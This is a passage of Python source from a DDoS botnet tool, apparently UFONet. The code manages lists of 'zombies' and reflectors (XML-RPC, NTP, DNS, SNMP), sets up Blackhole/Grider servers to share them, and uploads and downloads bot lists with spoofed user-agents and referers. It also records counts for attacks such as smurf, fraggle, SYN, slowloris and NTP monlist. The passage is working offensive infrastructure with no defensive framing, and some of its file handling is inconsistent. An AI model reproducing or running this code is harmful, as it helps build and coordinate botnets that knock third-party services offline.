if fname == 'dns.txt':
in_file = self.warping_path+"/"+fname
in_data = open(in_file, "rb").read()
out_gz = self.warping_path+"/"+"warps.txt.gz"
gzf = gzip.open(out_gz, "wb")
gzf.write(in_data)
gzf.close()
os.unlink(in_file)
print(" - "+fname+" -> "+self.warping_path+"/"+"warps.txt.gz")
os.chmod(self.warping_path+"/"+"warps.txt.gz", self.warping_folder_permissions)
if fname == 'dorks.txt':
print(" - "+fname+" -> "+self.warping_path+"/"+fname)
os.chmod(self.warping_path+"/"+fname, self.warping_folder_permissions)
print("")
print("[AI] [Info] [Control] [DEPLOY] Files are ready to be shared with other 'motherships'...\n\n[AI] [Info] [DEPLOY] Other requirements:\n")
print(" - 1) Setup web server (apache, nginx...)")
print(" - 2) Make your web server accessible from the Internet (NAT/VPS) <-> ex: 'http(s)://<your ip>/ufonet/'")
print(" - 3a) Start [Blackhole] with: './ufonet --blackhole' (or python3 ufonet --blackhole &)")
print(" - 3b) Start [Grider] with: './ufonet --grider' (or python3 ufonet --grider &)")
print(" - 4) Share your IP on the sneaknet! (ex: SHIP.RADAR) ;-)")
print("")
except Exception as e:
print("[Error] "+str(e))
print("\n[AI] Something was wrong deploying in: '/var/www/ufonet'... -> [Aborting!]\n")
# generate [Blackhole] server to share [Zombies]
if options.blackhole is not None:
self.banner()
try:
blackhole_lib = os.path.abspath(os.path.join('core/tools')) # add [Blackhole] lib
sys.path.append(blackhole_lib)
from core.tools.blackhole import BlackHole
print("\n[AI] Initiating void generation sequence...\n")
print('='*22 + '\n')
app = BlackHole()
app.start()
while True: time.sleep(1)
except KeyboardInterrupt:
print("\n[AI] Terminating void generation sequence...\n")
app.collapse()
except Exception as e:
print("[Error] "+str(e))
print("\n[AI] Something was wrong generating [Blackhole]... -> [Aborting!]\n")
# create [Grider] server to share [Stats/Wargames/Messages]
if options.grider is not None:
self.banner()
try:
grider_lib = os.path.abspath(os.path.join('core/tools')) # add [Grider] lib
sys.path.append(grider_lib)
from core.tools.grider import Grider
print("\n[AI] Initiating void generation sequence...\n")
print('='*22 + '\n')
app = Grider()
app.start()
while True: time.sleep(1)
except KeyboardInterrupt:
print("\n[AI] Terminating void generation sequence...\n")
app.collapse()
except Exception as e:
print("[Error] "+str(e))
print("\n[AI] Something was wrong generating [Grider]... -> [Aborting!]\n")
# download list of [Zombies] from a [Blackhole] IP
if options.dip is not None:
options.download = True
self.blackhole = options.dip
# upload list of [Zombies] to a [Blackhole] IP
if options.upip is not None:
options.upload = True
self.blackhole = options.upip
# download list of [Zombies] from Community server [20/01/2020 OK!]
if options.download:
try:
self.banner()
if options.dip is not None:
print(("\n[AI] Downloading list of [Zombies] from [Private] server: "+self.blackhole+" ...\n"))
else:
print("\n[AI] Downloading list of [Zombies] from [Community] server ...\n")
print('='*22 + '\n')
download_list = self.downloading_list()
except Exception as e:
print ("[Error] [AI] Something wrong downloading! -> [Exiting!]\n")
return
# upload list of [Zombies] to Community server [20/01/2020 OK!]
if options.upload:
try:
self.banner()
if options.upip is not None:
print(("\n[AI] Uploading list of [Zombies] to [Private] server: "+self.blackhole+" ...\n"))
else:
print("\n[AI] Uploading list of [Zombies] to [Community] server ...\n")
print('='*22 + '\n')
upload_list = self.uploading_list()
except Exception as e:
print(("[Error] [AI] Something wrong uploading! "+str(e)+" -> [Exiting!]\n"))
if DEBUG == True:
traceback.print_exc()
return #sys.exit(2)
# download list of [Zombies] from GitHub server [20/01/2020 OK!]
if options.download_github:
try:
self.banner()
print("\n[AI] Downloading list of [Zombies] from [GitHub] server ...\n")
print('='*22 + '\n')
download_github_list = self.downloading_github_list()
except Exception as e:
print ("[Error] [AI] Something wrong downloading! -> [Exiting!]\n")
return
# upload list of [Zombies] to GitHub server [20/01/2020 OK!]
if options.upload_github:
try:
self.banner()
print("\n[AI] Uploading 'zombies' to [GitHub] is simple. Follow the next steps:\n")
print('='*22 + '\n')
upload_github_list = self.uploading_github_list()
except Exception as e:
print(("[Error] [AI] Something wrong uploading! "+str(e)+" -> [Exiting!]\n"))
if DEBUG == True:
traceback.print_exc()
return #sys.exit(2)
# starting new zombie thread
def connect_zombies(self, zombie):
z=Zombie(self, zombie)
t = threading.Thread(target=z.connect, name=zombie)
t.start()
# single connection handling
def connect_zombie(self, zombie):
z=Zombie(self,zombie)
return z.connect()
def extract_proxy(self, proxy):
sep = ":"
proxy_ip = proxy.rsplit(sep, 1)[0]
if proxy_ip.startswith('http://'):
proxy_ip = proxy_ip.replace('http://', '')
elif proxy_ip.startswith('https://'):
proxy_ip = proxy_ip.replace('https://', '')
if proxy_ip == '127.0.0.1': # working by using 'localhost' as http proxy (privoxy, ...)
proxy_ip = 'localhost'
proxy_port = proxy.rsplit(sep, 1)[1]
proxy_url = proxy_ip + ":" + proxy_port # ex: localhost:8118
return proxy_url
def proxy_transport(self, proxy):
proxy_url = self.extract_proxy(proxy)
proxy = urllib.request.ProxyHandler({'https': proxy_url})
opener = urllib.request.build_opener(proxy)
urllib.request.install_opener(opener)
def check_mothership_chargo(self):
f = open(self.zombies_file)
self.zombies = f.readlines()
self.zombies = [zombie.replace('\n', '') for zombie in self.zombies]
self.list_zombies = []
for zombie in self.zombies:
t = urlparse(zombie)
name_zombie = t.netloc
if name_zombie == "":
name_zombie = zombie
self.list_zombies.append(name_zombie)
self.num_zombies = str(len(self.zombies))
f.close()
f = open(self.aliens_file)
self.aliens = f.readlines()
self.aliens = [alien.replace('\n', '') for alien in self.aliens]
self.list_aliens = []
for alien in self.aliens:
t = urlparse(alien)
name_alien = t.netloc
if name_alien == "":
name_alien = alien
self.list_aliens.append(name_alien)
self.num_aliens = str(len(self.aliens))
f.close()
f = open(self.droids_file)
self.droids = f.readlines()
self.droids = [droid.replace('\n', '') for droid in self.droids]
self.list_droids = []
for droid in self.droids:
t = urlparse(droid)
name_droid = t.netloc
if name_droid == "":
name_droid = droid
self.list_droids.append(name_droid)
self.num_droids = str(len(self.droids))
f.close()
f = open(self.ucavs_file)
self.ucavs = f.readlines()
self.ucavs = [ucav.replace('\n', '') for ucav in self.ucavs]
self.list_ucavs = []
for ucav in self.ucavs:
t = urlparse(ucav)
name_ucav = t.netloc
if name_ucav == "":
name_ucav = ucav
self.list_ucavs.append(name_ucav)
self.num_ucavs = str(len(self.ucavs))
f.close()
f = open(self.rpcs_file)
self.rpcs = f.readlines()
self.rpcs = [rpc.replace('\n', '') for rpc in self.rpcs]
self.list_rpcs = []
for rpc in self.rpcs:
t = urlparse(rpc)
name_rpc = t.netloc
if name_rpc == "":
name_rpc = rpc
self.list_rpcs.append(name_rpc)
self.num_rpcs = str(len(self.rpcs))
f.close()
self.total_botnet = str(int(self.num_zombies) + int(self.num_aliens) + int(self.num_droids) + int(self.num_ucavs) + int(self.num_rpcs))
return self.total_botnet
def update_flying_stats(self):
if not os.path.exists(self.mothership_stats_file) == True: # create data when no stats file (first time used)
with open(self.mothership_stats_file, "w") as f:
json.dump({"flying": "0", "missions": "0", "scanner": "0", "transferred": "0", "max_chargo": "0", "completed": "0", "loic": "0", "loris": "0", "ufosyn": "0", "spray": "0", "smurf": "0", "fraggle": "0", "xmas": "0", "ufoack": "0", "uforst": "0", "droper": "0", "overlap": "0", "pinger": "0", "ufoudp": "0", "nuke": "0", "tachyon": "0", "monlist": "0", "sniper": "0", "crashed": "0"}, f, indent=4) # starting reset
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
aflying = data["flying"]
aflying = str(int(aflying) + 1) # add new flying time
data["flying"] = aflying
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_mothership_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
acompleted = data["completed"]
acompleted = str(int(acompleted) + 1) # add new completed attack
data["completed"] = acompleted
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_targets_crashed(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
tcrashed = data["crashed"]
tcrashed = str(int(tcrashed) + 1) # add new crashed target
data["crashed"] = tcrashed
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_missions_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
missions = data["missions"]
missions = str(int(missions) + 1) # add new mission target
data["missions"] = missions
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_scanner_stats(self, num):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
scanner = data["scanner"]
scanner = str(int(scanner) + int(num)) # add new zombies found by dorking to mothership stats
data["scanner"] = scanner
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_transferred_stats(self, num):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
transferred = data["transferred"]
transferred = str(int(transferred) + int(num)) # add new zombies found by downloading via blackholes to mothership stats
data["transferred"] = transferred
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_max_chargo(self, chargo):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
amax_chargo = data["max_chargo"]
if int(chargo) > int(amax_chargo): # new max chargo found
amax_chargo = chargo # add new max chargo
else:
amax_chargo = data["max_chargo"]
data["max_chargo"] = amax_chargo
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_loic_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
aloic = data["loic"]
aloic = str(int(aloic) + 1) # add new loic attack to recorded stats
self.total_loic = self.total_loic + 1 # add new loic attack to session stats
data["loic"] = aloic
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_loris_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
aloris = data["loris"]
aloris = str(int(aloris) + 1) # add new loris attack to recorded stats
self.total_loris = self.total_loris + 1 # add new loris attack to session stats
data["loris"] = aloris
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_ufosyn_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
aufosyn = data["ufosyn"]
aufosyn = str(int(aufosyn) + 1) # add new ufosyn attack to recorded stats
self.total_syn = self.total_syn + 1 # add new ufosyn attack to session stats
data["ufosyn"] = aufosyn
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_spray_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
aspray = data["spray"]
aspray = str(int(aspray) + 1) # add new spray attack to recorded stats
self.total_spray = self.total_spray + 1 # add new spray attack to session stats
data["spray"] = aspray
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_smurf_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
asmurf = data["smurf"]
asmurf = str(int(asmurf) + 1) # add new smurf attack to recorded stats
self.total_smurf = self.total_smurf + 1 # add new smurf attack to session stats
data["smurf"] = asmurf
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_fraggle_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
afraggle = data["fraggle"]
afraggle = str(int(afraggle) + 1) # add new fraggle attack to recorded stats
self.total_fraggle = self.total_fraggle + 1 # add new fraggle attack to session stats
data["fraggle"] = afraggle
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_xmas_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
axmas = data["xmas"]
axmas = str(int(axmas) + 1) # add new xmas attack to recorded stats
self.total_xmas = self.total_xmas + 1 # add new xmas attack to session stats
data["xmas"] = axmas
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_ufoack_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
aufoack = data["ufoack"]
aufoack = str(int(aufoack) + 1) # add new ufoack attack to recorded stats
self.total_ufoack = self.total_ufoack + 1 # add new ufoack attack to session stats
data["ufoack"] = aufoack
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_uforst_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
auforst = data["uforst"]
auforst = str(int(auforst) + 1) # add new uforst attack to recorded stats
self.total_uforst = self.total_uforst + 1 # add new uforst attack to session stats
data["uforst"] = auforst
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_droper_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
adroper = data["droper"]
adroper = str(int(adroper) + 1) # add new droper attack to recorded stats
self.total_droper = self.total_droper + 1 # add new droper attack to session stats
data["droper"] = adroper
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_overlap_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
aoverlap = data["overlap"]
aoverlap = str(int(aoverlap) + 1) # add new overlap attack to recorded stats
self.total_overlap = self.total_overlap + 1 # add new overlap attack to session stats
data["overlap"] = aoverlap
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_pinger_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
apinger = data["pinger"]
apinger = str(int(apinger) + 1) # add new pinger attack to recorded stats
self.total_pinger = self.total_pinger + 1 # add new pinger attack to session stats
data["pinger"] = apinger
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_ufoudp_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
aufoudp = data["ufoudp"]
aufoudp = str(int(aufoudp) + 1) # add new ufoudp attack to recorded stats
self.total_ufoudp = self.total_ufoudp + 1 # add new ufoudp attack to session stats
data["ufoudp"] = aufoudp
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_nuke_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
anuke = data["nuke"]
anuke = str(int(anuke) + 1) # add new nuke attack to recorded stats
self.total_nuke = self.total_nuke + 1 # add new nuke attack to session stats
data["nuke"] = anuke
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_tachyon_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
atachyon = data["tachyon"]
atachyon = str(int(atachyon) + 1) # add new tachyon attack to recorded stats
self.total_tachyon = self.total_tachyon + 1 # add new tachyon attack to session stats
data["tachyon"] = atachyon
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_monlist_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
amonlist = data["monlist"]
amonlist = str(int(amonlist) + 1) # add new monlist attack to recorded stats
self.total_monlist = self.total_monlist + 1 # add new monlist attack to session stats
data["monlist"] = amonlist
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def update_sniper_stats(self):
stats_json_file = open(self.mothership_stats_file, "r")
data = json.load(stats_json_file)
stats_json_file.close()
asniper = data["sniper"]
asniper = str(int(asniper) + 1) # add new sniper attack to recorded stats
self.total_sniper = self.total_sniper + 1 # add new sniper attack to session stats
data["sniper"] = asniper
stats_json_file = open(self.mothership_stats_file, "w+")
stats_json_file.write(json.dumps(data))
stats_json_file.close()
def uploading_list(self):
from io import BytesIO
self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
abductions = "botnet/abductions.txt.gz"
troops = "botnet/troops.txt.gz"
robots = "botnet/robots.txt.gz"
drones = "botnet/drones.txt.gz"
reflectors = "botnet/reflectors.txt.gz"
crystals = "botnet/crystals.txt.gz"
warps = "botnet/warps.txt.gz"
bosons = "botnet/bosons.txt.gz"
if self.options.timeout: # set timeout
try:
timeout = int(self.options.timeout)
except:
timeout = 5
else:
timeout = 5
if timeout < 1:
timeout = 5
try:
print("[AI] Checking integrity of [Blackhole]: "+self.blackhole+"\n")
if self.options.forcessl:
if self.options.proxy: # set proxy
self.proxy_transport(options.proxy)
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/abductions.txt.gz', None, headers)
abductions_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/troops.txt.gz', None, headers)
troops_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/robots.txt.gz', None, headers)
robots_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/drones.txt.gz', None, headers)
drones_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/reflectors.txt.gz', None, headers)
reflectors_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/crystals.txt.gz', None, headers)
crystals_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/warps.txt.gz', None, headers)
warps_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('https://'+self.blackhole+'/ufonet/bosons.txt.gz', None, headers)
bosons_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
else:
if self.options.proxy: # set proxy
self.proxy_transport(options.proxy)
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/abductions.txt.gz', None, headers)
abductions_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/troops.txt.gz', None, headers)
troops_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/robots.txt.gz', None, headers)
robots_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/drones.txt.gz', None, headers)
drones_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/reflectors.txt.gz', None, headers)
reflectors_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/crystals.txt.gz', None, headers)
crystals_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/warps.txt.gz', None, headers)
warps_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
req = urllib.request.Request('http://'+self.blackhole+'/ufonet/bosons.txt.gz', None, headers)
bosons_reply = urllib.request.urlopen(req, context=self.ctx, timeout=timeout).read()
if abductions_reply == "" and troops_reply == "" and robots_reply == "" and drones_reply == "" and reflectors_reply == "" and crystals_reply == "" and warps_reply == "" and bosons_reply == "":
print("[AI] [Control] [Blackhole] [Server] Reply: [VORTEX FAILED!]")
print('-'*12 + '\n')
print("[Error] [AI] Unable to uploading list of [Zombies] to this [Blackhole] [Server] -> [Exiting!]\n")
return
print("[AI] [Control] [Blackhole] [Server] Reply: [VORTEX READY!] ;-)")
f_in_abductions = gzip.open(BytesIO(abductions_reply), 'rb')
f_out_abductions = open('botnet/abductions.txt', 'wb')
f_out_abductions.write(f_in_abductions.read())
f_in_abductions.close()
f_out_abductions.close()
num_zombies = 0
with open('botnet/abductions.txt') as f:
for _ in f:
num_zombies = num_zombies + 1
print("\n[Info] [Zombies] on [Blackhole]: "+ str(num_zombies))
f_in_robots = gzip.open(BytesIO(robots_reply), 'rb')
f_out_robots = open('botnet/robots.txt', 'wb')
f_out_robots.write(f_in_robots.read())
f_in_robots.close()
f_out_robots.close()
num_robots = 0
with open('botnet/robots.txt') as f:
for _ in f:
num_robots = num_robots + 1
print("[Info] [Droids] on [Blackhole] : "+ str(num_robots))
f_in_troops = gzip.open(BytesIO(troops_reply), 'rb')
f_out_troops = open('botnet/troops.txt', 'wb')
f_out_troops.write(f_in_troops.read())
f_in_troops.close()
f_out_troops.close()
num_aliens = 0
with open('botnet/aliens.txt') as f:
for _ in f:
num_aliens = num_aliens + 1
print("[Info] [Aliens] on [Blackhole] : "+ str(num_aliens))
f_in_drones = gzip.open(BytesIO(drones_reply), 'rb')
f_out_drones = open('botnet/drones.txt', 'wb')
f_out_drones.write(f_in_drones.read())
f_in_drones.close()
f_out_drones.close()
num_drones = 0
with open('botnet/drones.txt') as f:
for _ in f:
num_drones = num_drones + 1
print("[Info] [UCAVs] on [Blackhole] : "+ str(num_drones))
f_in_reflectors = gzip.open(BytesIO(reflectors_reply), 'rb')
f_out_reflectors = open('botnet/reflectors.txt', 'wb')
f_out_reflectors.write(f_in_reflectors.read())
f_in_reflectors.close()
f_out_reflectors.close()
num_reflectors = 0
with open('botnet/reflectors.txt') as f:
for _ in f:
num_reflectors = num_reflectors + 1
print("[Info] [X-RPCs] on [Blackhole] : "+ str(num_reflectors))
f_in_crystals = gzip.open(BytesIO(crystals_reply), 'rb')
f_out_crystals = open('botnet/crystals.txt', 'wb')
f_out_crystals.write(f_in_crystals.read())
f_in_crystals.close()
f_out_crystals.close()
num_crystals = 0
with open('botnet/crystals.txt') as f:
for _ in f:
num_crystals = num_crystals + 1
print("[Info] [NTPs] on [Blackhole] : "+ str(num_crystals))
f_in_warps = gzip.open(BytesIO(warps_reply), 'rb')
f_out_warps = open('botnet/warps.txt', 'wb')
f_out_warps.write(f_in_warps.read())
f_in_warps.close()
f_out_warps.close()
num_warps = 0
with open('botnet/warps.txt') as f:
for _ in f:
num_warps = num_warps + 1
print("[Info] [DNSs] on [Blackhole] : "+ str(num_warps))
f_in_bosons = gzip.open(BytesIO(bosons_reply), 'rb')
f_out_bosons = open('botnet/bosons.txt', 'wb')
f_out_bosons.write(f_in_bosons.read())
f_in_bosons.close()
f_out_bosons.close()
num_bosons = 0
with open('botnet/bosons.txt') as f:
for _ in f:
num_bosons = num_bosons + 1
print("[Info] [SNMPs] on [Blackhole] : "+ str(num_bosons))
print('-'*12 + '\n')
if not self.options.forceyes:
update_reply = input("[AI] Do you want to merge ONLY the new [Zombies] into [Blackhole]? (Y/n)")
print('-'*25)
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
os.remove('botnet/abductions.txt') # remove abductions file
os.remove('botnet/troops.txt') # remove troops file
os.remove('botnet/robots.txt') # remove robots file
os.remove('botnet/drones.txt') # remove drones file
os.remove('botnet/reflectors.txt') # remove reflectors file
os.remove('botnet/crystals.txt') # remove crystals file
os.remove('botnet/warps.txt') # remove warps file
os.remove('botnet/bosons.txt') # remove bosons file
print("\n[Info] [AI] [Control] Aborting uploading process and cleaning temporal files... -> [Exiting!]\n")
return
else:
print("\n[AI] Checking integrity of your list of [Zombies] -> [OK!]\n") # only upload valid zombies
print('='*35)
zombies = self.extract_zombies()
if not zombies:
return
test = self.testing(zombies)
zombies_community = []
zombies_added = 0
f = open('botnet/abductions.txt')
abductions = f.readlines()
abductions = [abduction.strip() for abduction in abductions]
f.close()
fz = open(self.zombies_file)
zombies = fz.readlines()
zombies = [zombie.strip() for zombie in zombies]
fz.close()
for zombie in zombies:
if zombie not in abductions:
zombies_community.append(zombie)
zombies_added = zombies_added + 1
else:
pass
print("[Info] [AI] New [Zombies] found: " + str(zombies_added))
aliens = self.extract_aliens()
if not aliens:
return
aliens_community = []
aliens_added = 0
f = open('botnet/troops.txt')
troops = f.readlines()
troops = [troop.strip() for troop in troops]
f.close()
fz = open(self.aliens_file)
aliens = fz.readlines()
aliens = [alien.strip() for alien in aliens]
fz.close()
for alien in aliens:
if alien not in troops:
aliens_community.append(alien)
aliens_added = aliens_added + 1
else:
pass
print("[Info] [AI] New [Aliens] found : " + str(aliens_added))
droids = self.extract_droids()
if not droids:
return
droids_community = []
droids_added = 0
f = open('botnet/robots.txt')
robots = f.readlines()
robots = [robot.strip() for robot in robots]
f.close()
fz = open(self.droids_file)
droids = fz.readlines()
droids = [droid.strip() for droid in droids]
fz.close()
for droid in droids:
if droid not in robots:
droids_community.append(droid)
droids_added = droids_added + 1
else:
pass
print("[Info] [AI] New [Droids] found : " + str(droids_added))
ucavs = self.extract_ucavs()
if not ucavs:
return
ucavs_community = []
ucavs_added = 0
f = open('botnet/drones.txt')
drones = f.readlines()
drones = [drone.strip() for drone in drones]
f.close()
fz = open(self.ucavs_file)
ucavs = fz.readlines()
ucavs = [ucav.strip() for ucav in ucavs]
fz.close()
for ucav in ucavs:
if ucav not in drones:
ucavs_community.append(ucav)
ucavs_added = ucavs_added + 1
else:
pass
print("[Info] [AI] New [UCAVs] found : " + str(ucavs_added))
rpcs = self.extract_rpcs()
if not rpcs:
return
rpcs_community = []
rpcs_added = 0
f = open('botnet/reflectors.txt')
reflectors = f.readlines()
reflectors = [reflector.strip() for reflector in reflectors]
f.close()
fz = open(self.rpcs_file)
rpcs = fz.readlines()
rpcs = [rpc.strip() for rpc in rpcs]
fz.close()
for rpc in rpcs:
if rpc not in reflectors:
rpcs_community.append(rpc)
rpcs_added = rpcs_added + 1
else:
pass
print("[Info] [AI] New [X-RPCs] found : " + str(rpcs_added))
ntps = self.extract_ntps()
if not ntps:
return
ntps_community = []
ntps_added = 0
f = open('botnet/crystals.txt')
crystals = f.readlines()
crystals = [crystal.strip() for crystal in crystals]
f.close()
fz = open(self.ntps_file)
ntps = fz.readlines()
ntps = [ntp.strip() for ntp in ntps]
fz.close()
for ntp in ntps:
if ntp not in crystals:
ntps_community.append(ntp)
ntps_added = ntps_added + 1
else:
pass
print("[Info] [AI] New [NTPs] found : " + str(ntps_added))
dnss = self.extract_dnss()
if not dnss:
return
dnss_community = []
dnss_added = 0
f = open('botnet/warps.txt')
warps = f.readlines()
warps = [warp.strip() for warp in warps]
f.close()
fz = open(self.dnss_file)
dnss = fz.readlines()
dnss = [dns.strip() for dns in dnss]
fz.close()
for dns in dnss:
if dns not in warps:
dnss_community.append(dns)
dnss_added = dnss_added + 1
else:
pass
print("[Info] [AI] New [DNSs] found : " + str(dnss_added))
snmps = self.extract_snmps()
if not snmps:
return
snmps_community = []
snmps_added = 0
f = open('botnet/bosons.txt')
bosons = f.readlines()
bosons = [boson.strip() for boson in bosons]
f.close()
fz = open(self.snmps_file)
snmps = fz.readlines()
snmps = [snmp.strip() for snmp in snmps]
fz.close()
for snmp in snmps:
if snmp not in crystals:
snmps_community.append(snmp)
snmps_added = snmps_added + 1
else:
pass
print("[Info] [AI] New [SNMPs] found : " + str(snmps_added))
print('-'*12 + '\n')
if zombies_added == 0 and aliens_added == 0 and droids_added == 0 and ucavs_added == 0 and rpcs_added == 0 and ntps_added == 0 and dnss_added == 0 and snmps_added == 0: # not any zombie
os.remove('botnet/abductions.txt') # remove abductions file
os.remove('botnet/troops.txt') # remove troops file
os.remove('botnet/robots.txt') # remove robots file
os.remove('botnet/drones.txt') # remove ucavs file
os.remove('botnet/reflectors.txt') # remove rpcs file
os.remove('botnet/crystals.txt') # remove crystals file
os.remove('botnet/warps.txt') # remove warps file
os.remove('botnet/bosons.txt') # remove snmps file
print("[Info] [AI] Try to search for new [Zombies]. These are already in this [Blackhole] -> [Exiting!]\n")
return
else:
fc = gzip.open('botnet/community_zombies.txt.gz', 'wb')
for zombie in zombies_community:
fc.write(zombie.strip()+"\n")
fc.close()
os.remove('botnet/abductions.txt') # remove abductions file
fc = gzip.open('botnet/community_aliens.txt.gz', 'wb')
for alien in aliens_community:
fc.write(alien.strip()+"\n")
fc.close()
os.remove('botnet/troops.txt') # remove troops file
fc = gzip.open('botnet/community_droids.txt.gz', 'wb')
for droid in droids_community:
fc.write(droid.strip()+"\n")
fc.close()
os.remove('botnet/robots.txt') # remove robots file
fc = gzip.open('botnet/community_ucavs.txt.gz', 'wb')
for ucav in ucavs_community:
fc.write(ucav.strip()+"\n")
fc.close()
os.remove('botnet/drones.txt') # remove drones file
fc = gzip.open('botnet/community_rpcs.txt.gz', 'wb')
for rpc in rpcs_community:
fc.write(rpc.strip()+"\n")
fc.close()
os.remove('botnet/reflectors.txt') # remove reflectors file
fc = gzip.open('botnet/community_ntps.txt.gz', 'wb')
for ntp in ntps_community:
fc.write(ntp.strip()+"\n")
fc.close()
os.remove('botnet/crystals.txt') # remove crystals file
fc = gzip.open('botnet/community_dnss.txt.gz', 'wb')
for dns in dnss_community:
